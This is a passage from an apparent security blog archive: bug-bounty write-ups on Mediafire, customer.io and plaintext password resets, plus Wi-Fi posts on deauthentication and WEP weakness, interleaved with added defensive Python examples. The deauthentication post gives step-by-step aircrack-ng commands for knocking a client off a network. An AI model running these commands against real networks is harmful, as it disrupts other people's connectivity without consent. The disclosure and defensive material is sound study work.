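    """Defence in depth for the second half of the bug: the share response
    zeroed the URL but still carried personGuid for a private account.
    Omit the identifier entirely when the recipient is private."""
    recipient = USERS[recipient_guid]
    if recipient.private:
        return {"profileImageUrl": f"/api/people/{ZERO_GUID}/profileImage"}
    return {
        "profileImageUrl": f"/api/people/{recipient.guid}/profileImage",
        "personGuid": recipient.guid,
    }
```

Dropping personGuid from the share response only closes the leak the post found; the fix is the authorization check in the hardened handler, which holds even if the GUID becomes known some other way.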
<b><br /></b>
<b>They gave me an account's email and asked me to download the profile picture of that account, and I successfully did that.</b><br />
<b><br /></b>
<b>The team took about 1 year to fix this issue. :( </b><br />
<b><br /></b>
<b>That's all for this post. </b><br />
<b><br /></b>
<b><br /></b>
<b>Thanks</b><br />
<b>Jitendra K Singh ( Team Computer Korner)</b><br />
<b><br /></b>
<b><br /></b>
<b>Feel Free To Leave A Comment</b>
<b>If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You! </b>
</div>
Author: Jitendra (http://www.blogger.com/profile/12006899852837970196, noreply@blogger.com), comments: 0
Post id: tag:blogger.com,1999:blog-5302093523789144315.post-5809256146061006517, published: 2017-02-27T00:13:00.002+05:30, updated: 2017-02-27T23:33:13.504+05:30
Title: Bug Bounty: Bypassing Account Suspension In order to get full access to account [Mediafire]
<div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.mediafire.com/favicon-114.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://www.mediafire.com/favicon-114.png" /></a></div>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b>Hi there,</b><br />
<b><br /></b>
<b><br /></b>
<b>In this post I am going to discuss a bug which I found on Mediafire.</b><br />
<b>I noticed that Mediafire has a bug bounty program.</b><br />
<b><br /></b>
<b><br /></b>
<br />
<h3 style="text-align: left;">
<b>What is Mediafire:- </b></h3>
<b></b><br />
<b>MediaFire is a file hosting, file synchronization, and cloud storage service based in Shenandoah, Texas, United States. Founded in June 2006 by Derek Labian and Tom Langridge, the company provides client software for Microsoft Windows, Mac OS X, Linux, Android, iOS, BlackBerry 10, and web browsers. MediaFire has 43 million registered users and attracted 1.3 billion unique visitors to its domain in 2012.</b><br />
<b><br /></b>
<b>There are three types of account on Mediafire: </b><br />
<b>1. Basic (free) :- Has basic features with limited storage and bandwidth.</b><br />
<b>2. Pro (paid) :- Has more features; as a paid plan it has much larger bandwidth and 100GB storage.</b><br />
<b>3. Business (paid) :- For teams, with all Mediafire features: you can add other users, customize the download page, increase bandwidth, export folders as zip, and download the users' logs.</b><br />
<b><br /></b>
<b><br /></b>
<b>As it requires an international credit or debit card to create a Pro or Business account, I created a Basic account for free and started looking at the functionality.</b><br />
<b><br /></b>
<b>Most features, like deleting files, generating one-time download links, etc., use the Mediafire API. So I quickly looked at the documentation of the API. You can find the Mediafire API <a href="https://www.mediafire.com/developers/" rel="nofollow" target="_blank">here</a>.</b><br />
<b><br /></b>
<b>So what happens on login:-</b><br />
<b>Whenever you log in to your account it generates an authenticity_token. The token lives for 10 minutes; after that it renews the token using this API call </b><br />
<div style="text-align: left;">
<span style="color: #38761d; font-family: "menlo" , "monaco" , "courier new" , monospace;"><span style="background-color: #f9f9f9; font-size: 11px;">https://www.mediafire.com/api/1.5/user/renew_session_token.php</span></span></div>
<b>but if your session is idle for 5-7 minutes then you have to enter the password again to renew the token. </b><br />
<b><br /></b>
<br />
<h3 style="text-align: left;">
<b>The Bug:-</b></h3>
<div>
<b>So actually I was looking at some of their functionality, but due to some work I logged out from my account, and after logging out it redirected me to a page which says </b></div>
<div>
<b><br /></b></div>
<div>
<div>
<b><u>This account has been locked.</u></b></div>
<div>
<b><u>See our page about account suspensions for more information.</u></b></div>
</div>
<div>
<b><br /></b></div>
<div>
<b>I was like WHAT DID I DO WRONG? :(</b></div>
<div>
<b><br /></b></div>
<div>
<b>So after some time, after completing the work, I came back and tried to log in again, but after redirecting me to the home page it again redirected me to that page which shows that the account is suspended.</b></div>
<div>
<b><br /></b></div>
<div>
<b>Now I fired up Burp and started looking at what was actually going on.</b></div>
<div>
<br /></div>
<div>
<b>1. After login it generates the authenticity token and redirects to the home page. </b></div>
<div>
<b>2. After verifying that this is a suspended account it redirects me to that page which shows the warning.</b></div>
<div>
<b><br /></b></div>
<div>
<b>So I can do anything using the WebApp.</b></div>
<div>
<b>I started looking at the Mediafire API and tried one API call, the one that creates a folder: http://www.mediafire.com/api/1.5/folder/create.php</b></div>
<div>
<b><br /></b></div>
<div>
<b>Now I copied the authenticity token which was generated during login and tried to create a folder, and </b><b>it was successful.</b></div>
<div>
<b><br /></b></div>
<div>
<b>I could also access files, etc., using the Mediafire Android app.</b></div>
<div>
<b><br /></b></div>
<div>
<b>So what is actually happening is that the API generates the token but does not invalidate it after confirming that the account is suspended, so using the API I can access most of the features of Mediafire.</b></div>
<div>
<b><br /></b></div>
<div>
<b>So now, as a fix, Mediafire invalidates the token as soon as they confirm that the account is suspended, and using the mobile application you can't use any features with a suspended account. </b></div>
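What the post describes is a token whose validity is checked only against its own expiry, never against the account's standing. The added Python example below (not Mediafire's code; the accounts, token store and API stand-in are constructed) reproduces that behaviour and shows the two places a fix belongs: revoking the token at the moment the suspension is confirmed, and re-checking the account on every API call.

```python
"""Added example, not Mediafire's code: a session token must be tied to the
account's current standing, not only to its own expiry. Models the bug in the
post (login issues a token, the web app then notices the suspension and only
redirects, and the token keeps working against the API) beside two fixes.
Accounts, tokens and the API stand-in are constructed."""
import secrets

TOKEN_LIFETIME = 600  # seconds; the post says the token is renewed every 10 minutes


class Backend:
    def __init__(self, revoke_on_suspended_login=False, check_status_per_request=False):
        self.accounts = {}   # user -> {"suspended": bool}
        self.tokens = {}     # token -> {"user": str, "expires": float}
        self.revoke_on_suspended_login = revoke_on_suspended_login
        self.check_status_per_request = check_status_per_request

    def login(self, user, now):
        """Issues a token before the suspension check, as the post describes.
        A real login verifies the password first (omitted in this model)."""
        token = secrets.token_hex(16)
        self.tokens[token] = {"user": user, "expires": now + TOKEN_LIFETIME}
        return token

    def post_login_page(self, token):
        """The redirect the web app performs right after login."""
        entry = self.tokens[token]
        if self.accounts[entry["user"]]["suspended"]:
            if self.revoke_on_suspended_login:
                del self.tokens[token]   # fix 1: the token dies with the redirect
            return "account_locked"
        return "home"

    def suspend(self, user):
        """Suspension while sessions are live: kill every token for the account."""
        self.accounts[user]["suspended"] = True
        for t in [t for t, v in self.tokens.items() if v["user"] == user]:
            del self.tokens[t]

    def _authorize(self, token, now):
        entry = self.tokens.get(token)
        if entry is None or entry["expires"] <= now:
            return None
        # fix 2: an unexpired token is not enough; the account must still be in good standing
        if self.check_status_per_request and self.accounts[entry["user"]]["suspended"]:
            return None
        return entry["user"]

    def create_folder(self, token, name, now):
        """Stand-in for folder/create.php: True if the call would be honoured."""
        return self._authorize(token, now) is not None


def suspended_account_scenario(revoke_on_suspended_login, check_status_per_request):
    """Log in to an already suspended account, get the lock page, then call the API."""
    b = Backend(revoke_on_suspended_login, check_status_per_request)
    b.accounts["alice"] = {"suspended": True}
    t0 = 1_000_000.0
    token = b.login("alice", t0)
    page = b.post_login_page(token)
    return page, b.create_folder(token, "new-folder", t0 + 60)


def live_session_scenario():
    """Account suspended while logged in; the token must stop working immediately."""
    b = Backend()
    b.accounts["bob"] = {"suspended": False}
    token = b.login("bob", 0.0)
    before = b.create_folder(token, "f", 1.0)
    b.suspend("bob")
    return before, b.create_folder(token, "f", 2.0)
```

The per-request status check is the one that also covers clients the web flow never sees, such as the Android app the post mentions, since it does not depend on any particular login path remembering to revoke.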
<div>
<b><br /></b></div>
<div>
<div>
<b>Disclosure Timeline</b></div>
<div>
<b>27-Feb-2016: Reported</b></div>
<div>
<b>9-Mar-2016: First response received > Looking at this report</b></div>
<div>
<b>14-Mar-2016: Bounty awarded (certificate and pro account)</b></div>
<div>
<b>15-Mar-2016: Resolved</b></div>
<div>
<b>27-Feb-2017: Disclosed</b></div>
</div>
<b><br /></b>
<b><br /></b>
<b>Thanks </b><br />
Jitendra K Singh (Team Computer Korner)<br />
<br />
</div>
Author: Jitendra (http://www.blogger.com/profile/12006899852837970196, noreply@blogger.com), comments: 1
Post id: tag:blogger.com,1999:blog-5302093523789144315.post-42660965963851262, published: 2017-01-31T13:01:00.000+05:30, updated: 2017-01-31T13:01:04.656+05:30
Title: Website Sends the Actual Password on the Mobile Number: Considered as the Severe Vulnerability or Not?
<div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<b>Hi there,</b><br />
<b><br /></b>
<b><br /></b>
<b>I was just looking at some websites which provide a free SMS sending service. There are a lot of websites which provide this functionality in India. </b><br />
<b>So what is an SMS?</b><br />
<b><br /></b>
<b>SMS stands for Short Messaging Service. It uses standardized communication protocols to enable mobile phone devices to exchange short text messages.</b><br />
<b><br /></b>
<b>There are lots of websites which you can use to send free SMS to a mobile phone; all you need is to create an account on your desired website and you are ready.</b><br />
<b><br /></b>
<b>Now I just looked at one website like that. I am not going to mention its name; let's call it site.com.</b><br />
<b>So on site.com you can use your mobile number to create an account; they will deliver a temporary password to you on the given number, and after login you have to change the password to your desired one.</b><br />
<b><br /></b>
<b>Now what happens if you forget your password? In case you forgot your password, just enter your mobile number on their password reset page and they will send you the password you were using on that website. It's pretty simple.</b><br />
<b>So did you notice anything which can create a risk or threat?</b><br />
<b>Some can understand, but for the others let me explain.</b><br />
<b><br /></b>
<b><br /></b>
<b>They are not using any hashing algorithm for hashing the password.</b><br />
<b>If a password is hashed then it can't be converted back to the actual text; you can only compare the hashes of other candidates in order to guess the actual word.</b><br />
<b><br /></b>
<b>Now how did I identify that this website is not using any hashing algorithm?</b><br />
<b><br /></b>
<b>As I mentioned earlier, once a text is converted into a hash it can't be converted back to the actual word from which the hash was generated.</b><br />
<b>As site.com is sending the actual password to the mobile phone, it tells us that they are not using any hashing algorithm.</b><br />
<b>As they are not using the most important security layer, password hashing, how are you going to trust this website? Maybe they are saving all the contacts you added and the messages you sent in plain form, giving hackers a chance to steal all of your info if they get access to the database of that website.</b><br />
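What the post infers from the reset SMS is right: a site can only text back your password if it keeps it in a recoverable form. The added Python example below (not site.com's code; the phone number, password and SMS outbox are constructed) shows the same registration and reset flow with the password stored only as a salted PBKDF2 hash, so the site has nothing to send back and instead issues a short-lived, single-use reset code.

```python
"""Added example, not site.com's code: a password reset that never needs the
password. Passwords are stored only as salted PBKDF2-HMAC-SHA256 hashes (Python
stdlib), which cannot be turned back into the password; a forgotten password
is handled with a short-lived, single-use reset code sent to the phone.
Users, numbers and the SMS outbox are constructed."""
import hashlib
import hmac
import os
import secrets

# Iteration count kept modest so the example runs quickly; the OWASP Password
# Storage Cheat Sheet recommends 600,000 for PBKDF2-HMAC-SHA256 in production.
ITERATIONS = 100_000
RESET_CODE_TTL = 600  # seconds


def hash_password(password, salt=None):
    """Returns (salt, digest). A fresh random salt per user defeats precomputed tables."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return salt, digest


def verify_password(password, salt, digest):
    """Recompute and compare in constant time; the stored digest is never 'decrypted'."""
    _, candidate = hash_password(password, salt)
    return hmac.compare_digest(candidate, digest)


class AccountStore:
    def __init__(self):
        self.users = {}         # phone -> {"salt": bytes, "digest": bytes}
        self.reset_codes = {}   # code -> (phone, expires)
        self.sms_outbox = []    # constructed stand-in for the SMS gateway

    def register(self, phone, password):
        salt, digest = hash_password(password)
        self.users[phone] = {"salt": salt, "digest": digest}

    def login(self, phone, password):
        user = self.users.get(phone)
        return user is not None and verify_password(password, user["salt"], user["digest"])

    def request_reset(self, phone, now):
        """What site.com should do instead of texting the password back.
        The reply is identical whether or not the number is registered."""
        if phone in self.users:
            code = secrets.token_urlsafe(24)
            self.reset_codes[code] = (phone, now + RESET_CODE_TTL)
            self.sms_outbox.append((phone, "Your reset code: " + code))
        return "If this number is registered, a reset code has been sent."

    def complete_reset(self, code, new_password, now):
        """The code is consumed on first use, whether or not it was still valid."""
        entry = self.reset_codes.pop(code, None)
        if entry is None or entry[1] <= now:
            return False
        self.register(entry[0], new_password)
        return True
```

The test a user can apply from the outside is the one the post applies: if the reset message contains the password you chose, the site holds it in the clear; a site built like the store above can only ever send a code.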
<br />
<b><br /></b>
<br />
<b><br /></b>
<b>So I will suggest that you shouldn't use those sites which are not providing the most common security layer to their users.</b><br />
<b><br /></b>
<b>Now the decision is yours: do you want to let your private information be publicly available? </b><br />
<b>If not, then beware!</b><br />
<b><br /></b>
<b>Have a Good Day </b><br />
<b><br /></b>
<b>Thanks</b><br />
<b><br /></b>
<b>Jitendra K Singh (Team Computer Korner) </b><br />
<b><br /></b><b>Special thanks to Moto G</b>
<b><br /></b>
</div>
Author: Jitendra (http://www.blogger.com/profile/12006899852837970196, noreply@blogger.com), comments: 0
Post id: tag:blogger.com,1999:blog-5302093523789144315.post-5281067150644062239, published: 2016-12-03T13:29:00.001+05:30, updated: 2016-12-03T13:34:55.108+05:30
Title: Bug Bounty: Vulnerability In customer.io
<div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcQmIgxmYOjx1_o8Twk9D7emuFerUU-znGWPMo0EFmrfYrBdimqFng" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcQmIgxmYOjx1_o8Twk9D7emuFerUU-znGWPMo0EFmrfYrBdimqFng" /></a></div>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b>Hi there,</b><br />
<b><br /></b>
<b>First of all, sorry for this long pause from my side. I was busy with some things and it took me some time to sort everything out.</b><br />
<b><br /></b>
<b>So in this post I am going to discuss a vulnerability I found in customer.io.</b><br />
<b><br /></b>
<b>About customer.io:-</b><br />
<b>A light integration sends the Customer.io platform customer behavior data from your web or mobile app. Then you can start sending messages based on what users do or don't do after they log in. Increase engagement, revenue, and customer success.</b><br />
<br />
<br />
<br />
<b>I was looking at the SPF records of some companies and I found that some companies have customer.io in their SPF record; they are allowing customer.io to send emails on their behalf.</b><br />
<b>So I directly went to customer.io and created an account.</b><br />
<b>After creating an account I created a template for sending this as an email.</b><br />
<b>Now you can add as many email accounts as you want for sending email, so I tried saving an email address of a site which has customer.io in its SPF record. The email address was no-reply@example.com (I don't want to disclose the website).</b><br />
<b>The email was added successfully, but after this one problem arose: customer.io doesn't let me send the email from that second email address I have added to my account.</b><br />
<b>So there are two conditions:-</b><br />
<b><br /></b>
<b>1. When creating an account you have to verify the email address.</b><br />
<b>2. You can only send the email from the email address you used while creating the account.</b><br />
<b><br /></b>
<b>So I tried some ideas like sending an email, capturing that request with Burp and modifying the email, but these didn't work.</b><br />
<b><br /></b>
<b>While adding the email there was an option to edit my primary email. That looked like something vulnerable, so I clicked on edit email, edited my primary email to no-reply@example.com, and it was successful. Now I could send emails on behalf of the customers of that company.</b><br />
<b><br /></b>
<b>First of all I reported this to some of their customers who were vulnerable to this; after that I wrote an email to customer.io and explained this to them.</b><br />
<b>They told me that they are fixing this ASAP, but since they don't have a bug bounty program they are not rewarding me anything. That was fine, because I do this testing for exploring and gaining knowledge.</b><br />
<b><br /></b>
<b>They sent me a reply >24 hours after reporting this, and I was happy with their quick response.</b><br />
<br />
<h4 style="text-align: left;">
FIX</h4>
<div>
<b>They did two things to fix this vulnerability. First of all they blocked my account. 😁😁😁😁😁😁😁😁😁😁. And after that they added domain verification: whenever you try to add an email you have to verify its ownership. </b><br />
<b><br /></b>
<br /></div>
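The fix the post mentions, verifying ownership before an address can be used, has to cover every path that sets an address, including the edit-primary-email form that was missed. The added Python example below (not customer.io's code; the signing key, addresses, clock and mail outbox are constructed) shows a challenge-based ownership check and a primary-address change that is refused until the address passes it.

```python
"""Added example, not customer.io's code: a sender address becomes usable only
after its owner proves control of the mailbox, and changing the primary
address must go through the same proof. The bug in the post was an edit path
that skipped that proof. Ownership is proven with an HMAC-signed, time-limited
challenge the service mails to the address. The signing key, addresses, clock
and the mail outbox are constructed."""
import hashlib
import hmac

CHALLENGE_TTL = 3600  # seconds


class SenderAddresses:
    def __init__(self, signing_key):
        self.key = signing_key
        self.verified = set()   # addresses proven to belong to this account
        self.pending = {}       # address -> expiry of the outstanding challenge
        self.primary = None
        self.outbox = []        # constructed stand-in: (address, expires, token) as e-mailed

    def _token(self, address, expires):
        """Server-side signature over the address and expiry; nothing to store per challenge."""
        msg = ("%s|%d" % (address, expires)).encode("utf-8")
        return hmac.new(self.key, msg, hashlib.sha256).hexdigest()

    def start_verification(self, address, now):
        """Mail a challenge; only whoever reads that mailbox can complete it."""
        expires = int(now) + CHALLENGE_TTL
        self.pending[address] = expires
        self.outbox.append((address, expires, self._token(address, expires)))

    def confirm(self, address, expires, token, now):
        """Accept only a current, unexpired, correctly signed challenge; then consume it."""
        if self.pending.get(address) != expires or expires <= now:
            return False
        if not hmac.compare_digest(token, self._token(address, expires)):
            return False
        del self.pending[address]
        self.verified.add(address)
        return True

    def can_send_from(self, address):
        """Sending permission is derived from the proof, never from a form field."""
        return address in self.verified

    def set_primary_vulnerable(self, address):
        """The edit path from the post: the new primary is trusted without any proof."""
        self.primary = address
        self.verified.add(address)

    def set_primary_hardened(self, address):
        """Any address, primary or not, must already be verified before it can be used."""
        if address not in self.verified:
            return False
        self.primary = address
        return True
```

The domain verification customer.io added has the same shape with a DNS TXT record as the proof instead of a mailed token; what matters is that every code path that can make an address sendable runs through `confirm`, so an edit form cannot become a second, unchecked way in.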
<div>
<b><br /></b></div>
<div>
<b>Hope you liked it </b></div>
<div>
<b><br /></b></div>
<div>
<b>Thanks </b></div>
<div>
<b>Jitendra K Singh(Team Computer Korner)</b></div>
<br />
</div>
Author: Jitendra (http://www.blogger.com/profile/12006899852837970196, noreply@blogger.com), comments: 0
Post id: tag:blogger.com,1999:blog-5302093523789144315.post-1077944358639293138, published: 2016-08-12T00:31:00.000+05:30, updated: 2016-08-12T00:31:30.808+05:30
Title: Wi-Fi Hacking: Deauthentication Attack
<div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<b>Hi there,</b><br />
<b><br /></b>
<b>So this post is about the deauthentication attack.</b><br />
<b>A deauthentication attack can be done without connecting to the target network.</b><br />
<b><br /></b>
<h3 style="text-align: left;">
<b>How It works:-</b></h3>
<div>
<b>So in this process aireplay-ng sends deauthentication packets to both the AP (access point or router) and the client which is connected to it.</b></div>
<div>
<b>It sends spoofed packets to the AP, and also some packets to the client, and the AP acknowledges packets which say that the target client is not authenticated to the AP. </b></div>
<div>
<b>In other words, the attacker sends some deauth packets to the AP pretending to be the client, and at the same time sends deauth packets to the client pretending to be the router, saying that it needs to authenticate again.</b></div>
<div>
<b><br /></b></div>
<div>
<b><br /></b></div>
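From the network owner's side the behaviour described above is visible: a client leaving or roaming produces one or two deauthentication frames, a forced disconnection produces a burst in both directions. The added Python example below (not from the post; the frame records, MAC addresses, reason codes and threshold are constructed) runs a few such records through a sliding-window counter of the kind a wireless IDS uses.

```python
"""Added example, not from the post: spotting a deauthentication flood from the
defender's side. A few constructed 802.11 management-frame records, in the shape
a capture tool or wireless IDS might log them, run through a sliding-window
counter that flags any sender/receiver pair seeing more deauth or disassoc
frames in a short window than a client leaving or roaming would produce.
MAC addresses, timestamps, reason codes and the threshold are constructed."""
from collections import defaultdict, deque

DEAUTH, DISASSOC = "deauth", "disassoc"
WINDOW_SECONDS = 2.0
THRESHOLD = 5          # frames per pair per window; tune to the site's normal churn

AP = "aa:bb:cc:00:00:01"        # constructed BSSID
CLIENT = "11:22:33:44:55:66"    # constructed station

# Constructed capture: (timestamp, subtype, source, destination, reason_code)
FRAMES = [
    (0.00, "beacon", AP, "ff:ff:ff:ff:ff:ff", None),
    (0.10, DEAUTH, AP, CLIENT, 3),             # a single frame: client leaving normally
    (3.00, "probe_resp", AP, CLIENT, None),
]
# The pattern the post describes: frames to the client "from" the AP and to the
# AP "from" the client, interleaved a few milliseconds apart.
FRAMES += [(5.00 + 0.02 * k, DEAUTH, AP, CLIENT, 7) for k in range(6)]
FRAMES += [(5.01 + 0.02 * k, DEAUTH, CLIENT, AP, 7) for k in range(6)]


def detect_deauth_flood(frames, window=WINDOW_SECONDS, threshold=THRESHOLD):
    """Returns one alert per (source, destination) pair that crosses the threshold
    within the window; a pair alerts once so a long flood does not spam."""
    recent = defaultdict(deque)
    alerts, alerted = [], set()
    for ts, subtype, src, dst, reason in sorted(frames, key=lambda f: f[0]):
        if subtype not in (DEAUTH, DISASSOC):
            continue
        key = (src, dst)
        q = recent[key]
        q.append(ts)
        while q and ts - q[0] > window:      # drop frames that fell out of the window
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"source": src, "destination": dst, "count": len(q),
                           "window_start": q[0], "window_end": ts, "reason": reason})
    return alerts
```

Detection is the fallback; the mitigation is 802.11w Protected Management Frames, under which the AP and client discard deauthentication frames that do not carry a valid integrity check, so a forged frame is ignored rather than obeyed.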
<h3 style="text-align: left;">
How We can do this attack:-</h3>
<div>
So we need the aircrack-ng suite to carry out this attack. Let's start.</div>
<div>
<br /></div>
<div>
<ol style="text-align: left;">
<li><b>First of all you need a wireless card in monitor mode. To enable this, type<br />airmon-ng start [Your wifi card name] and press enter; it will enable the wireless card in monitor mode.</b></li>
<li><b>Now scan all networks by typing<br />airodump-ng [Your wireless card in monitor mode]</b></li>
<li><div class="separator" style="clear: both; text-align: center;">
<b style="text-align: left;"></b></div>
<div class="separator" style="clear: both; display: inline !important; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9l_AY6mRCQNHURxPp2wK1jYlBaA8Nx49CsQ32d0ye1FUKjMW5LNMv4zE-srvMz46ElyWkrn62WwUdEJPwpUxcXluSWFR9ZU_45aWZJ8Y4XFZKsqcfz1lm_chklYfC6whKZ-QbrBonGho/s1600/all_network.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9l_AY6mRCQNHURxPp2wK1jYlBaA8Nx49CsQ32d0ye1FUKjMW5LNMv4zE-srvMz46ElyWkrn62WwUdEJPwpUxcXluSWFR9ZU_45aWZJ8Y4XFZKsqcfz1lm_chklYfC6whKZ-QbrBonGho/s320/all_network.png" width="320" /></a></div>
</li>
</ol>
</div>
<b>I have censored some information. After scanning the networks, choose the AP on which you want to deauth a client. </b><br />
<b><br /></b>
<b><br /></b>
<b>4. Now, to deauthenticate a specific client, first look at how many clients are associated to that network. To do this simply type</b><br />
<b>airodump-ng --channel [no] --bssid [mac of target network] [wifi card in monitor mode] and press enter</b><br />
<b><br /></b>
<b>It will give an output like this: </b><br />
<div class="separator" style="clear: both; text-align: center;">
<b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiN9iR_OSLxtYspm1uYfSQ0bC57sT17PDulXJQB3URetexlYtxgfHo2Kv0GZFu5erXKbJABKVQmWW0FfqH8KexcK2UVMzrfw62Ew3uKiUM0_nmRRpCF3NMgnHGfRpPogtkXIR4K27CqIFA/s1600/devices_connected_to_netw.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiN9iR_OSLxtYspm1uYfSQ0bC57sT17PDulXJQB3URetexlYtxgfHo2Kv0GZFu5erXKbJABKVQmWW0FfqH8KexcK2UVMzrfw62Ew3uKiUM0_nmRRpCF3NMgnHGfRpPogtkXIR4K27CqIFA/s320/devices_connected_to_netw.png" width="320" /></a></b></div>
<br />
<b><br /></b>
<b>5. Now to deauthenticate the client use this command</b><br />
<b>aireplay-ng --deauth [no of packets you want to send] -a [AP's MAC address] -c [client Mac address] [wifi card in monitor mode]</b><br />
<b> If you want to deauthenticate the client for a long time you can set a large value for [no of packets], like 10000, etc.</b><br />
<b><br /></b>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqcfwMy_uUigUinrA7kRJ1mDmRkbK_tDfM5QUS97CC6fFULUdIhZSaAJDAKrprfYv10QupaIjKDKldon9hwbyyrNI2bVN2SXE3sI4eXyfnPVhBRqcIDLXE2JcGqoHi0nBYXPNAHHvbqUQ/s1600/deauthenticated.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqcfwMy_uUigUinrA7kRJ1mDmRkbK_tDfM5QUS97CC6fFULUdIhZSaAJDAKrprfYv10QupaIjKDKldon9hwbyyrNI2bVN2SXE3sI4eXyfnPVhBRqcIDLXE2JcGqoHi0nBYXPNAHHvbqUQ/s320/deauthenticated.png" width="320" /></a></div>
<b>So after this the client will not be able to authenticate to the target network.</b><br />
<b><br /></b>
<b>Hope you enjoyed reading this.</b><br />
<b>Next Post: Cracking WEP encryption Practical </b><br />
<b><br /></b>
<b><br /></b>
<b>Regards</b><br />
<b>Jitendra (Team Computer Korner)</b><br />
<b><br /></b>
<b><br /></b>
</div>
Author: Jitendra (http://www.blogger.com/profile/12006899852837970196, noreply@blogger.com), comments: 1
Post id: tag:blogger.com,1999:blog-5302093523789144315.post-760453339626242795, published: 2016-08-04T00:07:00.000+05:30, updated: 2016-08-04T00:27:00.194+05:30
Title: WEP encryption: How it works and its weakness
<div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<b><br /></b>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.hot-spotwifi.com/assets/wifi-158401_1280.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.hot-spotwifi.com/assets/wifi-158401_1280.png" height="230" width="320" /></a></div>
<b><br /></b>
<b>Hi there,</b><br />
<b><br /></b>
<b>First of all sorry for the delay as I was on vacations but finally I am back with a new post.</b><br />
<br />
<b>So in the past few posts we talked about MAC addresses and how to log in to an AP which has a MAC filter enabled on it.</b><br />
<b>So now we will talk about encryption and how to crack it.</b><br />
<b>Our first topic is WEP encryption.</b><br />
<b><br /></b>
<b>So lets start:-</b><br />
<b><br /></b>
<b>WEP is an old encryption scheme, but it is still used in many networks to provide data confidentiality; that's why we are learning how to break it.</b><br />
<b>WEP stands for Wired Equivalent Privacy. It was designed to provide data confidentiality comparable to that of wired networks.</b><br />
<b><br /></b>
<b><br /></b>
<br />
<h3 style="text-align: left;">
<b>Introduction:-</b></h3>
<b>WEP uses an algorithm known as Rivest Cipher 4. RC4 was designed by Ron Rivest of RSA Security in 1987.</b><br />
<b>With the RC4 algorithm, data packets are encrypted at the AP (access point) and then decrypted at the client. What WEP does is ensure that each packet has its own keystream by using a random 24-bit initialization vector (IV), which is sent unencrypted. This means that if you are able to capture data packets, you will be able to read the IV.</b><br />
<b><br /></b>
<b><br /></b>
<h3 style="text-align: left;">
<b>Authentication:-</b></h3>
<div>
<b>There are two types of authentication that are used in WEP encryption </b></div>
<div>
<b>1. Open System Authentication:- In this authentication the WLAN client does not need to provide its credentials to the access point for authentication.</b></div>
<div>
<b>2. Shared Key Authentication:- It takes place in the following steps.</b></div>
<div>
<b>The client sends an authentication request to the AP.</b></div>
<div>
<b>The AP replies with a clear-text challenge.</b></div>
<div>
<b>After these two steps the client encrypts the clear-text challenge using the configured or entered WEP key and sends it back to the AP.</b></div>
<div>
<b>Now the AP decrypts the response; if it matches the challenge text then you will be authenticated, otherwise a negative reply will be received.</b></div>
<div>
<b><br /></b></div>
<h3 style="text-align: left;">
<b>Cracking:-</b></h3>
<div>
<b><br /></b></div>
<b>So the weakness here is that the IV is only a 24-bit initialization vector.</b><br />
<b>So on a busy network the randomness does not help, because there are too many packets being sent and received while the IV is always just a 24-bit random value, so the same IV gets reused.</b><br />
<br />
<b>So we can collect two or more packets which have the same initialization vector, and after that we can use aircrack-ng to determine the keystream and the WEP key.</b><br />
<br />
<b>If you capture a lot of packets then the chances of determining the key increase.</b><br />
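The two facts above, a 24-bit IV sent in clear and a per-packet RC4 key formed from that IV and the shared key, are enough to show the problem in code. The added Python example below (not from the post; the WEP key, IVs and packet contents are constructed) implements RC4, encrypts two packets under the same IV, shows that their ciphertexts XOR to the XOR of the plaintexts and that a known header yields keystream bytes, and computes the birthday bound for a 24-bit IV space. It goes slightly beyond the post by quantifying the "busy network" argument.

```python
"""Added example, not from the post: why the 24-bit IV is the weak point.
Implements RC4, the cipher WEP runs, builds the WEP per-packet key as IV || key,
shows that two packets under the same IV share a keystream (so the XOR of the
ciphertexts is the XOR of the plaintexts, and a known header gives keystream
bytes), and computes how few packets a 24-bit IV space survives before a repeat
is likely. The WEP key, IVs and packet contents are constructed."""
import math


def rc4_keystream(key, n):
    """Textbook RC4: key scheduling (KSA), then n bytes of the pseudo-random stream (PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def rc4(key, data):
    """RC4 encryption and decryption are the same XOR with the keystream."""
    return xor_bytes(data, rc4_keystream(key, len(data)))


def wep_encrypt(wep_key, iv, plaintext):
    """WEP: the per-packet RC4 key is the 3-byte IV followed by the shared key;
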